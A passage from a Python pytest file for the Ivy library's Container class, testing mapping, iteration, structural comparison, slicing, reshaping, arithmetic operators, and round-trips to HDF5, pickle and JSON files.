    assert (ivy.to_numpy(container_shuffled["b"]["d"]) == ivy.to_numpy(data)).all()
    assert (ivy.to_numpy(container_shuffled.b.d) == ivy.to_numpy(data)).all()
    # with key_chains to not apply pruned: listed leaves are dropped
    container_shuffled = container.shuffle(
        0,
        Container({"a": None, "b": {"d": None}}),
        to_apply=False,
        prune_unapplied=True,
    )
    data = ivy.array([1, 2, 3], device=device)
    ivy.functional.ivy.random.seed()
    shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
    assert "a" not in container_shuffled
    assert (ivy.to_numpy(container_shuffled["b"]["c"]) == shuffled_data).all()
    assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
    assert "b/d" not in container_shuffled
    # map sequences: lists of arrays are shuffled element-wise
    dict_in = {
        "a": ivy.array([1, 2, 3], device=device),
        "b": [ivy.array([1, 2, 3], device=device), ivy.array([1, 2, 3], device=device)],
    }
    container = Container(dict_in)
    container_shuffled = container.shuffle(0, map_sequences=True)
    data = ivy.array([1, 2, 3], device=device)
    ivy.functional.ivy.random.seed()
    shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
    assert (ivy.to_numpy(container_shuffled["a"]) == shuffled_data).all()
    assert (ivy.to_numpy(container_shuffled.a) == shuffled_data).all()
    assert (ivy.to_numpy(container_shuffled["b"][0]) == shuffled_data).all()
    assert (ivy.to_numpy(container_shuffled.b[0]) == shuffled_data).all()
    assert (ivy.to_numpy(container_shuffled["b"][1]) == shuffled_data).all()
    assert (ivy.to_numpy(container_shuffled.b[1]) == shuffled_data).all()
@pytest.mark.parametrize("include_empty", [True, False])
def test_container_to_iterator(include_empty, device, call):
    """to_iterator yields (key-chain, value) pairs in depth-first order."""
    if include_empty:
        a_val, bc_val, bd_val = Container(), Container(), Container()
    else:
        a_val = ivy.array([1], device=device)
        bc_val = ivy.array([2], device=device)
        bd_val = ivy.array([3], device=device)
    cont = Container({"a": a_val, "b": {"c": bc_val, "d": bd_val}})
    # full key chains
    expected = [("a", a_val), ("b/c", bc_val), ("b/d", bd_val)]
    it = cont.to_iterator(include_empty=include_empty)
    for (kc, val), (exp_kc, exp_val) in zip(it, expected):
        assert kc == exp_kc
        assert val is exp_val
    # leaf keys only
    expected = [("a", a_val), ("c", bc_val), ("d", bd_val)]
    it = cont.to_iterator(leaf_keys_only=True, include_empty=include_empty)
    for (key, val), (exp_key, exp_val) in zip(it, expected):
        assert key == exp_key
        assert val is exp_val
@pytest.mark.parametrize("include_empty", [True, False])
def test_container_to_iterator_values(include_empty, device, call):
    """to_iterator_values yields the leaf values in depth-first order."""
    if include_empty:
        leaves = [Container(), Container(), Container()]
    else:
        leaves = [ivy.array([i], device=device) for i in [1, 2, 3]]
    cont = Container({"a": leaves[0], "b": {"c": leaves[1], "d": leaves[2]}})
    for value, expected in zip(
        cont.to_iterator_values(include_empty=include_empty), leaves
    ):
        assert value is expected
@pytest.mark.parametrize("include_empty", [True, False])
def test_container_to_iterator_keys(include_empty, device, call):
    """to_iterator_keys yields key chains, or bare leaf keys when asked."""
    if include_empty:
        a_val, bc_val, bd_val = Container(), Container(), Container()
    else:
        a_val = ivy.array([1], device=device)
        bc_val = ivy.array([2], device=device)
        bd_val = ivy.array([3], device=device)
    cont = Container({"a": a_val, "b": {"c": bc_val, "d": bd_val}})
    # full key chains
    for kc, expected in zip(
        cont.to_iterator_keys(include_empty=include_empty), ["a", "b/c", "b/d"]
    ):
        assert kc == expected
    # leaf keys only
    for key, expected in zip(
        cont.to_iterator_keys(leaf_keys_only=True, include_empty=include_empty),
        ["a", "c", "d"],
    ):
        assert key == expected
def test_container_to_flat_list(device, call):
    """to_flat_list returns the leaf arrays in depth-first key order."""
    dict_in = {
        "a": ivy.array([1], device=device),
        "b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
    }
    container = Container(dict_in)
    container_flat_list = container.to_flat_list()
    # zip would silently pass on a short list, so pin the length too
    assert len(container_flat_list) == 3
    # compare numerically via numpy rather than with framework-tensor `==`,
    # which only happens to be truthy for single-element arrays
    for value, expected in zip(container_flat_list, ([1], [2], [3])):
        assert np.allclose(ivy.to_numpy(value), np.array(expected))
def test_container_from_flat_list(device, call):
    """from_flat_list repopulates the leaves from a flat list, depth-first."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    cont = cont.from_flat_list([4, 5, 6])
    for chain, expected in [("a", 4), ("b/c", 5), ("b/d", 6)]:
        assert np.allclose(ivy.to_numpy(cont[chain]), np.array([expected]))
    assert np.allclose(ivy.to_numpy(cont.a), np.array([4]))
    assert np.allclose(ivy.to_numpy(cont.b.c), np.array([5]))
    assert np.allclose(ivy.to_numpy(cont.b.d), np.array([6]))
@pytest.mark.parametrize("inplace", [True, False])
def test_container_map(inplace, device, call):
    """Exercise Container.map across its option space: plain mapping,
    key-chain whitelists/blacklists, pruning of unapplied leaves,
    in-place mapping and mapping over sequence-valued leaves."""
    # without key_chains specification
    dict_in = {
        "a": ivy.array([1], device=device),
        "b": {"c": ivy.array([2], device=device), "d": ivy.array([3], device=device)},
    }
    container_orig = Container(dict_in)
    container = container_orig.deep_copy()
    container_mapped = container.map(lambda x, _: x + 1, inplace=inplace)
    # when mapping in place, the results live in the original container
    if inplace:
        container_iterator = container.to_iterator()
    else:
        container_iterator = container_mapped.to_iterator()
    for (key, value), expected_value in zip(
        container_iterator,
        [
            ivy.array([2], device=device),
            ivy.array([3], device=device),
            ivy.array([4], device=device),
        ],
    ):
        assert call(lambda x: x, value) == call(lambda x: x, expected_value)
    # with key_chains to apply: only "a" and "b/c" are incremented
    container = container_orig.deep_copy()
    container_mapped = container.map(lambda x, _: x + 1, ["a", "b/c"], inplace=inplace)
    if inplace:
        container_mapped = container
    assert np.allclose(ivy.to_numpy(container_mapped["a"]), np.array([[2]]))
    assert np.allclose(ivy.to_numpy(container_mapped.a), np.array([[2]]))
    assert np.allclose(ivy.to_numpy(container_mapped["b"]["c"]), np.array([[3]]))
    assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[3]]))
    assert np.allclose(ivy.to_numpy(container_mapped["b"]["d"]), np.array([[3]]))
    assert np.allclose(ivy.to_numpy(container_mapped.b.d), np.array([[3]]))
    # with key_chains to apply pruned: unapplied leaves are dropped
    container = container_orig.deep_copy()
    container_mapped = container.map(
        lambda x, _: x + 1, ["a", "b/c"], prune_unapplied=True, inplace=inplace
    )
    if inplace:
        container_mapped = container
    assert np.allclose(ivy.to_numpy(container_mapped["a"]), np.array([[2]]))
    assert np.allclose(ivy.to_numpy(container_mapped.a), np.array([[2]]))
    assert np.allclose(ivy.to_numpy(container_mapped["b"]["c"]), np.array([[3]]))
    assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[3]]))
    # pruning only removes leaves on the returned copy, hence the guard
    if not inplace:
        assert "b/d" not in container_mapped
    # with key_chains to not apply (to_apply=False inverts the selection)
    container = container_orig.deep_copy()
    container_mapped = container.map(
        lambda x, _: x + 1,
        Container({"a": None, "b": {"d": None}}),
        to_apply=False,
        inplace=inplace,
    )
    if inplace:
        container_mapped = container
    assert np.allclose(ivy.to_numpy(container_mapped["a"]), np.array([[1]]))
    assert np.allclose(ivy.to_numpy(container_mapped.a), np.array([[1]]))
    assert np.allclose(ivy.to_numpy(container_mapped["b"]["c"]), np.array([[3]]))
    assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[3]]))
    assert np.allclose(ivy.to_numpy(container_mapped["b"]["d"]), np.array([[3]]))
    assert np.allclose(ivy.to_numpy(container_mapped.b.d), np.array([[3]]))
    # with key_chains to not apply pruned
    container = container_orig.deep_copy()
    container_mapped = container.map(
        lambda x, _: x + 1,
        Container({"a": None, "b": {"d": None}}),
        to_apply=False,
        prune_unapplied=True,
        inplace=inplace,
    )
    if inplace:
        container_mapped = container
    if not inplace:
        assert "a" not in container_mapped
    assert np.allclose(ivy.to_numpy(container_mapped["b"]["c"]), np.array([[3]]))
    assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[3]]))
    if not inplace:
        assert "b/d" not in container_mapped
    # with sequences: map_sequences=True maps into list-valued leaves too
    container_orig = Container(
        {
            "a": ivy.array([1], device=device),
            "b": [ivy.array([2], device=device), ivy.array([3], device=device)],
        }
    )
    container = container_orig.deep_copy()
    container_mapped = container.map(
        lambda x, _: x + 1, inplace=inplace, map_sequences=True
    )
    if inplace:
        container_mapped = container
    assert np.allclose(ivy.to_numpy(container_mapped["a"]), np.array([2]))
    assert np.allclose(ivy.to_numpy(container_mapped["b"][0]), np.array([3]))
    assert np.allclose(ivy.to_numpy(container_mapped["b"][1]), np.array([4]))
@pytest.mark.parametrize("inplace", [True, False])
def test_container_map_conts(inplace, device, call):
    """Exercise Container.map_conts, which applies a function to every
    sub-container, optionally including the container itself."""
    # without key_chains specification
    container_orig = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    # mutates each visited sub-container by attaching a new leaf "e"
    def _add_e_attr(cont_in):
        cont_in.e = ivy.array([4], device=device)
        return cont_in
    # with self: the top-level container also receives the "e" leaf
    container = container_orig.deep_copy()
    container_mapped = container.map_conts(lambda c, _: _add_e_attr(c), inplace=inplace)
    if inplace:
        container_mapped = container
    assert "e" in container_mapped
    assert np.array_equal(ivy.to_numpy(container_mapped.e), np.array([4]))
    assert "e" in container_mapped.b
    assert np.array_equal(ivy.to_numpy(container_mapped.b.e), np.array([4]))
    # without self: only nested sub-containers are visited
    container = container_orig.deep_copy()
    container_mapped = container.map_conts(
        lambda c, _: _add_e_attr(c), include_self=False, inplace=inplace
    )
    if inplace:
        container_mapped = container
    assert "e" not in container_mapped
    assert "e" in container_mapped.b
    assert np.array_equal(ivy.to_numpy(container_mapped.b.e), np.array([4]))
def test_container_multi_map(device, call):
    """multi_map applies a function across corresponding leaves of
    several containers at once."""
    cont0 = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    cont1 = Container(
        {
            "a": ivy.array([3], device=device),
            "b": {
                "c": ivy.array([4], device=device),
                "d": ivy.array([5], device=device),
            },
        }
    )
    summed = ivy.Container.multi_map(lambda xs, _: xs[0] + xs[1], [cont0, cont1])
    # verify each summed leaf via item access and attribute access
    for key_chain, want in (("a", [[4]]), ("b/c", [[6]]), ("b/d", [[8]])):
        by_item, by_attr = summed, summed
        for key in key_chain.split("/"):
            by_item = by_item[key]
            by_attr = getattr(by_attr, key)
        assert np.allclose(ivy.to_numpy(by_item), np.array(want))
        assert np.allclose(ivy.to_numpy(by_attr), np.array(want))
def test_container_common_key_chains(device, call):
    """common_key_chains returns exactly the key chains present in every
    one of the given containers."""
    arr1 = ivy.array([1], device=device)
    arr2 = ivy.array([2], device=device)
    arr3 = ivy.array([3], device=device)
    cont0 = Container({"a": arr1, "b": {"c": arr2, "d": arr3}})
    cont1 = Container({"b": {"c": arr2, "d": arr3, "e": arr1}})
    cont2 = Container({"a": arr1, "b": {"d": arr3, "e": arr1}})
    cases = [
        ([cont0], {"a", "b/c", "b/d"}),
        ([cont0, cont1], {"b/c", "b/d"}),
        ([cont0, cont2], {"a", "b/d"}),
        ([cont1, cont2], {"b/d", "b/e"}),
        ([cont0, cont1, cont2], {"b/d"}),
    ]
    for conts, want in cases:
        got = Container.common_key_chains(conts)
        assert len(got) == len(want)
        for key_chain in want:
            assert key_chain in got
def test_container_identical(device, call):
    """identical compares containers for matching structure and arrays;
    partial=True allows one container to be a sub-structure of the other."""
    arr1 = ivy.array([1], device=device)
    arr2 = ivy.array([2], device=device)
    arr3 = ivy.array([3], device=device)
    container0 = Container({"a": arr1, "b": {"c": arr2, "d": arr3}})
    container1 = Container({"a": arr1, "b": {"c": arr2, "d": arr3}})
    container2 = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    container3 = Container({"b": {"d": arr3}})
    container4 = Container({"d": arr3})
    # containers sharing the same underlying arrays are identical, either order
    for group in ([container0, container1], [container1, container0]):
        assert ivy.Container.identical(group)
    # container2 holds freshly-created (equal-valued) arrays -> not identical
    for group in (
        [container0, container2],
        [container2, container0],
        [container1, container2],
        [container2, container1],
    ):
        assert not ivy.Container.identical(group)
    # partial matching against a sub-container
    assert ivy.Container.identical([container0, container3], partial=True)
    assert ivy.Container.identical([container3, container0], partial=True)
    assert not ivy.Container.identical([container0, container4], partial=True)
    assert not ivy.Container.identical([container4, container0], partial=True)
def test_container_identical_structure(device, call):
    """identical_structure compares the nested key layout only, ignoring
    the leaf values; partial=True allows sub-structure containment."""
    container0 = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    container1 = Container(
        {
            "a": ivy.array([3], device=device),
            "b": {
                "c": ivy.array([4], device=device),
                "d": ivy.array([5], device=device),
            },
        }
    )
    container2 = Container(
        {
            "a": ivy.array([3], device=device),
            "b": {
                "c": ivy.array([4], device=device),
                "d": ivy.array([5], device=device),
                "e": ivy.array([6], device=device),
            },
        }
    )
    container3 = Container(
        {
            "a": ivy.array([3], device=device),
            "b": {
                "c": ivy.array([4], device=device),
                "d": ivy.array([5], device=device),
            },
            "e": ivy.array([6], device=device),
        }
    )
    container4 = Container({"b": {"d": ivy.array([4], device=device)}})
    container5 = Container({"d": ivy.array([4], device=device)})
    # identical nested key layouts (values differ, which is irrelevant)
    for group in (
        [container0, container1],
        [container1, container0],
        [container1, container0, container1],
    ):
        assert ivy.Container.identical_structure(group)
    # differing layouts
    for group in (
        [container2, container3],
        [container0, container3],
        [container1, container2],
        [container1, container0, container2],
    ):
        assert not ivy.Container.identical_structure(group)
    # partial: container4 ("b/d") is a sub-structure of all of these
    for other in (container0, container1, container2, container3, container4):
        assert ivy.Container.identical_structure([other, container4], partial=True)
    # but container5 ("d" at the top level) is not
    for other in (container0, container1, container2, container3, container4):
        assert not ivy.Container.identical_structure([other, container5], partial=True)
def test_container_identical_configs(device, call):
    """identical_configs compares construction configuration such as
    print_limit across containers."""
    container0 = Container({"a": ivy.array([1], device=device)}, print_limit=5)
    container1 = Container({"a": ivy.array([1], device=device)}, print_limit=5)
    container2 = Container({"a": ivy.array([1], device=device)}, print_limit=10)
    # matching configs, in either order and with repeats
    for group in (
        [container0, container1],
        [container1, container0],
        [container1, container0, container1],
    ):
        assert ivy.Container.identical_configs(group)
    # mismatching print_limit
    for group in ([container1, container2], [container1, container0, container2]):
        assert not ivy.Container.identical_configs(group)
def test_container_identical_array_shapes(device, call):
    """Exercise Container.identical_array_shapes.

    NOTE(review): container0 and container1 have per-key lengths (2,3,4)
    vs (4,2,3) yet compare as shape-identical below, so the matching
    semantics are looser than per-key exact shapes — confirm against the
    implementation before relying on this.
    """
    # without key_chains specification
    container0 = Container(
        {
            "a": ivy.array([1, 2], device=device),
            "b": {
                "c": ivy.array([2, 3, 4], device=device),
                "d": ivy.array([3, 4, 5, 6], device=device),
            },
        }
    )
    container1 = Container(
        {
            "a": ivy.array([1, 2, 3, 4], device=device),
            "b": {
                "c": ivy.array([3, 4], device=device),
                "d": ivy.array([3, 4, 5], device=device),
            },
        }
    )
    container2 = Container(
        {
            "a": ivy.array([1, 2, 3, 4], device=device),
            "b": {
                "c": ivy.array([3, 4], device=device),
                "d": ivy.array([3, 4, 5, 6], device=device),
            },
        }
    )
    # with identical
    assert ivy.Container.identical_array_shapes([container0, container1])
    assert ivy.Container.identical_array_shapes([container1, container0])
    assert ivy.Container.identical_array_shapes([container1, container0, container1])
    # NOTE(review): these call `identical` (value comparison), not
    # `identical_array_shapes` — possibly intended to be the latter; confirm.
    assert not ivy.Container.identical([container0, container2])
    assert not ivy.Container.identical([container1, container2])
    assert not ivy.Container.identical([container0, container1, container2])
def test_container_dtype(device, call):
    """dtype maps every array leaf to its dtype."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2.0], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    expected = [
        ivy.array([1], device=device).dtype,
        ivy.array([2.0], device=device).dtype,
        ivy.array([3], device=device).dtype,
    ]
    for (_, got), want in zip(cont.dtype().to_iterator(), expected):
        assert got == want
def test_container_with_entries_as_lists(device, call):
    """Array leaves become python lists; non-array leaves pass through."""
    if call in [helpers.tf_graph_call]:
        # to_list() requires eager execution
        pytest.skip()
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {"c": ivy.array([2.0], device=device), "d": "some string"},
        }
    )
    listed = cont.with_entries_as_lists()
    for (_, got), want in zip(listed.to_iterator(), [[1], [2.0], "some string"]):
        assert got == want
def test_container_reshape_like(device, call):
    """reshape_like reshapes each leaf to the shape given in a shape
    container, optionally prefixed by a shared leading shape."""
    cont = Container(
        {
            "a": ivy.array([[1.0]], device=device),
            "b": {
                "c": ivy.array([[3.0], [4.0]], device=device),
                "d": ivy.array([[5.0], [6.0], [7.0]], device=device),
            },
        }
    )
    new_shapes = Container({"a": (1,), "b": {"c": (1, 2, 1), "d": (3, 1, 1)}})

    def _check_shapes(reshaped, want_by_chain):
        # compare the leaf shapes through item access and attribute access
        for key_chain, want in want_by_chain:
            by_item, by_attr = reshaped, reshaped
            for key in key_chain.split("/"):
                by_item = by_item[key]
                by_attr = getattr(by_attr, key)
            assert list(by_item.shape) == want
            assert list(by_attr.shape) == want

    # without leading shape
    _check_shapes(
        cont.reshape_like(new_shapes),
        [("a", [1]), ("b/c", [1, 2, 1]), ("b/d", [3, 1, 1])],
    )
    # with leading shape: each leaf carries a batch dimension of 3
    cont = Container(
        {
            "a": ivy.array([[[1.0]], [[1.0]], [[1.0]]], device=device),
            "b": {
                "c": ivy.array(
                    [[[3.0], [4.0]], [[3.0], [4.0]], [[3.0], [4.0]]], device=device
                ),
                "d": ivy.array(
                    [
                        [[5.0], [6.0], [7.0]],
                        [[5.0], [6.0], [7.0]],
                        [[5.0], [6.0], [7.0]],
                    ],
                    device=device,
                ),
            },
        }
    )
    _check_shapes(
        cont.reshape_like(new_shapes, leading_shape=[3]),
        [("a", [3, 1]), ("b/c", [3, 1, 2, 1]), ("b/d", [3, 3, 1, 1])],
    )
def test_container_slice(device, call):
    """Integer indexing a container indexes every array leaf."""
    cont = Container(
        {
            "a": ivy.array([[0.0], [1.0]], device=device),
            "b": {
                "c": ivy.array([[1.0], [2.0]], device=device),
                "d": ivy.array([[2.0], [3.0]], device=device),
            },
        }
    )
    expected = (
        (0, {"a": 0.0, "b/c": 1.0, "b/d": 2.0}),
        (1, {"a": 1.0, "b/c": 2.0, "b/d": 3.0}),
    )
    for idx, leaf_vals in expected:
        sliced = cont[idx]
        for key_chain, val in leaf_vals.items():
            by_item, by_attr = sliced, sliced
            for key in key_chain.split("/"):
                by_item = by_item[key]
                by_attr = getattr(by_attr, key)
            assert np.array_equal(ivy.to_numpy(by_item), np.array([val]))
            assert np.array_equal(ivy.to_numpy(by_attr), np.array([val]))
def test_container_slice_via_key(device, call):
    """slice_via_key selects the given sub-key at every nesting level."""
    cont = Container(
        {
            "a": {
                "x": ivy.array([0.0], device=device),
                "y": ivy.array([1.0], device=device),
            },
            "b": {
                "c": {
                    "x": ivy.array([1.0], device=device),
                    "y": ivy.array([2.0], device=device),
                },
                "d": {
                    "x": ivy.array([2.0], device=device),
                    "y": ivy.array([3.0], device=device),
                },
            },
        }
    )
    for slice_key, leaf_vals in (
        ("x", {"a": 0.0, "b/c": 1.0, "b/d": 2.0}),
        ("y", {"a": 1.0, "b/c": 2.0, "b/d": 3.0}),
    ):
        sliced = cont.slice_via_key(slice_key)
        for key_chain, val in leaf_vals.items():
            by_item, by_attr = sliced, sliced
            for key in key_chain.split("/"):
                by_item = by_item[key]
                by_attr = getattr(by_attr, key)
            assert np.array_equal(ivy.to_numpy(by_item), np.array([val]))
            assert np.array_equal(ivy.to_numpy(by_attr), np.array([val]))
def test_container_to_and_from_disk_as_hdf5(device, call):
    """Round-trip containers through HDF5: save, load a slice, append at
    an offset, reload, and verify the reported file/batch size."""
    if call in [helpers.tf_graph_call]:
        # container disk saving requires eager execution
        pytest.skip()
    save_filepath = "container_on_disk.hdf5"
    dict_in_1 = {
        "a": ivy.array([np.float32(1.0)], device=device),
        "b": {
            "c": ivy.array([np.float32(2.0)], device=device),
            "d": ivy.array([np.float32(3.0)], device=device),
        },
    }
    container1 = Container(dict_in_1)
    # container2 holds the expected result after appending container1's
    # values at index 1: each leaf doubled along the batch dimension
    dict_in_2 = {
        "a": ivy.array([np.float32(1.0), np.float32(1.0)], device=device),
        "b": {
            "c": ivy.array([np.float32(2.0), np.float32(2.0)], device=device),
            "d": ivy.array([np.float32(3.0), np.float32(3.0)], device=device),
        },
    }
    container2 = Container(dict_in_2)
    # saving
    container1.to_disk_as_hdf5(save_filepath, max_batch_size=2)
    assert os.path.exists(save_filepath)
    # loading
    loaded_container = Container.from_disk_as_hdf5(save_filepath, slice(1))
    assert np.array_equal(ivy.to_numpy(loaded_container.a), ivy.to_numpy(container1.a))
    assert np.array_equal(
        ivy.to_numpy(loaded_container.b.c), ivy.to_numpy(container1.b.c)
    )
    assert np.array_equal(
        ivy.to_numpy(loaded_container.b.d), ivy.to_numpy(container1.b.d)
    )
    # appending: write the same values again starting at batch index 1
    container1.to_disk_as_hdf5(save_filepath, max_batch_size=2, starting_index=1)
    assert os.path.exists(save_filepath)
    # loading after append: full file now matches container2
    loaded_container = Container.from_disk_as_hdf5(save_filepath)
    assert np.array_equal(ivy.to_numpy(loaded_container.a), ivy.to_numpy(container2.a))
    assert np.array_equal(
        ivy.to_numpy(loaded_container.b.c), ivy.to_numpy(container2.b.c)
    )
    assert np.array_equal(
        ivy.to_numpy(loaded_container.b.d), ivy.to_numpy(container2.b.d)
    )
    # load slice: batch entry 1 equals the originally-saved values
    loaded_sliced_container = Container.from_disk_as_hdf5(save_filepath, slice(1, 2))
    assert np.array_equal(
        ivy.to_numpy(loaded_sliced_container.a), ivy.to_numpy(container1.a)
    )
    assert np.array_equal(
        ivy.to_numpy(loaded_sliced_container.b.c), ivy.to_numpy(container1.b.c)
    )
    assert np.array_equal(
        ivy.to_numpy(loaded_sliced_container.b.d), ivy.to_numpy(container1.b.d)
    )
    # file size: 3 leaves x batch of 2 float32 values
    file_size, batch_size = Container.h5_file_size(save_filepath)
    assert file_size == 6 * np.dtype(np.float32).itemsize
    assert batch_size == 2
    os.remove(save_filepath)
def test_container_to_disk_shuffle_and_from_disk_as_hdf5(device, call):
    """shuffle_h5_file must permute all datasets in an HDF5 file with the
    same ordering, reproducible here with the stdlib random module."""
    if call in [helpers.tf_graph_call]:
        # container disk saving requires eager execution
        pytest.skip()
    save_filepath = "container_on_disk.hdf5"
    dict_in = {
        "a": ivy.array([1, 2, 3], device=device),
        "b": {
            "c": ivy.array([1, 2, 3], device=device),
            "d": ivy.array([1, 2, 3], device=device),
        },
    }
    container = Container(dict_in)
    # saving
    container.to_disk_as_hdf5(save_filepath, max_batch_size=3)
    assert os.path.exists(save_filepath)
    # shuffling
    Container.shuffle_h5_file(save_filepath)
    # loading
    container_shuffled = Container.from_disk_as_hdf5(save_filepath, slice(3))
    # testing
    # NOTE(review): assumes shuffle_h5_file seeds stdlib random with 0 so
    # this local shuffle reproduces the on-disk permutation — confirm.
    data = np.array([1, 2, 3])
    random.seed(0)
    random.shuffle(data)
    assert (ivy.to_numpy(container_shuffled["a"]) == data).all()
    assert (ivy.to_numpy(container_shuffled.a) == data).all()
    assert (ivy.to_numpy(container_shuffled["b"]["c"]) == data).all()
    assert (ivy.to_numpy(container_shuffled.b.c) == data).all()
    assert (ivy.to_numpy(container_shuffled["b"]["d"]) == data).all()
    assert (ivy.to_numpy(container_shuffled.b.d) == data).all()
    os.remove(save_filepath)
def test_container_pickle(device, call):
    """Containers must survive a pickle round-trip, both with and without
    a bound local ivy handle (``ivyh``)."""
    if call in [helpers.tf_graph_call]:
        # container disk saving requires eager execution
        pytest.skip()
    dict_in = {
        "a": ivy.array([np.float32(1.0)], device=device),
        "b": {
            "c": ivy.array([np.float32(2.0)], device=device),
            "d": ivy.array([np.float32(3.0)], device=device),
        },
    }
    # without module attribute
    cont = Container(dict_in)
    assert cont._local_ivy is None
    pickled = pickle.dumps(cont)
    cont_again = pickle.loads(pickled)
    assert cont_again._local_ivy is None
    # BUGFIX: the results of these checks were previously discarded, so the
    # round-trip was never actually verified — assert them.
    assert ivy.Container.identical_structure([cont, cont_again])
    assert ivy.Container.identical_configs([cont, cont_again])
    # with module attribute
    cont = Container(dict_in, ivyh=ivy)
    assert cont._local_ivy is ivy
    pickled = pickle.dumps(cont)
    cont_again = pickle.loads(pickled)
    # noinspection PyUnresolvedReferences
    # BUGFIX: compare framework strings by value with `==`, not identity
    # with `is` — two equal str objects need not be the same object.
    assert cont_again._local_ivy.current_framework_str() == ivy.current_framework_str()
    assert ivy.Container.identical_structure([cont, cont_again])
    assert ivy.Container.identical_configs([cont, cont_again])
def test_container_to_and_from_disk_as_pickled(device, call):
    """Round-trip a container through to_disk_as_pickled/from_disk_as_pickled."""
    if call in [helpers.tf_graph_call]:
        # container disk saving requires eager execution
        pytest.skip()
    save_filepath = "container_on_disk.pickled"
    cont = Container(
        {
            "a": ivy.array([np.float32(1.0)], device=device),
            "b": {
                "c": ivy.array([np.float32(2.0)], device=device),
                "d": ivy.array([np.float32(3.0)], device=device),
            },
        }
    )
    # saving
    cont.to_disk_as_pickled(save_filepath)
    assert os.path.exists(save_filepath)
    # loading: every leaf must round-trip exactly
    loaded = Container.from_disk_as_pickled(save_filepath)
    for key_chain in ("a", "b/c", "b/d"):
        got, want = loaded, cont
        for key in key_chain.split("/"):
            got = getattr(got, key)
            want = getattr(want, key)
        assert np.array_equal(ivy.to_numpy(got), ivy.to_numpy(want))
    os.remove(save_filepath)
def test_container_to_and_from_disk_as_json(device, call):
    """JSON round-trip: serializable leaves survive unchanged, while
    array leaves come back as strings."""
    if call in [helpers.tf_graph_call]:
        # container disk saving requires eager execution
        pytest.skip()
    save_filepath = "container_on_disk.json"
    cont = Container(
        {
            "a": 1.274e-7,
            "b": {"c": True, "d": ivy.array([np.float32(3.0)], device=device)},
        }
    )
    # saving
    cont.to_disk_as_json(save_filepath)
    assert os.path.exists(save_filepath)
    # loading
    loaded = Container.from_disk_as_json(save_filepath)
    assert np.array_equal(loaded.a, cont.a)
    assert np.array_equal(loaded.b.c, cont.b.c)
    # the array leaf is not JSON-serializable and is stored as a string
    assert isinstance(loaded.b.d, str)
    os.remove(save_filepath)
def test_container_positive(device, call):
    """Unary ``+`` applies element-wise and leaves values unchanged."""
    cont = +Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([-2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    # verify each leaf via item access and attribute access
    for key_chain, want in (("a", [1]), ("b/c", [-2]), ("b/d", [3])):
        by_item, by_attr = cont, cont
        for key in key_chain.split("/"):
            by_item = by_item[key]
            by_attr = getattr(by_attr, key)
        assert np.allclose(ivy.to_numpy(by_item), np.array(want))
        assert np.allclose(ivy.to_numpy(by_attr), np.array(want))
def test_container_negative(device, call):
    """Unary ``-`` negates every leaf element-wise."""
    cont = -Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([-2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    # verify each leaf via item access and attribute access
    for key_chain, want in (("a", [-1]), ("b/c", [2]), ("b/d", [-3])):
        by_item, by_attr = cont, cont
        for key in key_chain.split("/"):
            by_item = by_item[key]
            by_attr = getattr(by_attr, key)
        assert np.allclose(ivy.to_numpy(by_item), np.array(want))
        assert np.allclose(ivy.to_numpy(by_attr), np.array(want))
def test_container_pow(device, call):
    """``Container ** Container`` raises corresponding leaves element-wise."""
    base = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    exponent = Container(
        {
            "a": ivy.array([2], device=device),
            "b": {
                "c": ivy.array([4], device=device),
                "d": ivy.array([6], device=device),
            },
        }
    )
    powered = base**exponent
    # 1**2=1, 2**4=16, 3**6=729; verify via item and attribute access
    for key_chain, want in (("a", [1]), ("b/c", [16]), ("b/d", [729])):
        by_item, by_attr = powered, powered
        for key in key_chain.split("/"):
            by_item = by_item[key]
            by_attr = getattr(by_attr, key)
        assert np.allclose(ivy.to_numpy(by_item), np.array(want))
        assert np.allclose(ivy.to_numpy(by_attr), np.array(want))
def test_container_scalar_pow(device, call):
    """``Container ** scalar`` squares every leaf here."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    cont = cont**2
    # verify each leaf via item access and attribute access
    for key_chain, want in (("a", [1]), ("b/c", [4]), ("b/d", [9])):
        by_item, by_attr = cont, cont
        for key in key_chain.split("/"):
            by_item = by_item[key]
            by_attr = getattr(by_attr, key)
        assert np.allclose(ivy.to_numpy(by_item), np.array(want))
        assert np.allclose(ivy.to_numpy(by_attr), np.array(want))
def test_container_reverse_scalar_pow(device, call):
    """``scalar ** Container`` exponentiates with each leaf as exponent."""
    cont = Container(
        {
            "a": ivy.array([1], device=device),
            "b": {
                "c": ivy.array([2], device=device),
                "d": ivy.array([3], device=device),
            },
        }
    )
    cont = 2**cont
    # 2**1=2, 2**2=4, 2**3=8; verify via item and attribute access
    for key_chain, want in (("a", [2]), ("b/c", [4]), ("b/d", [8])):
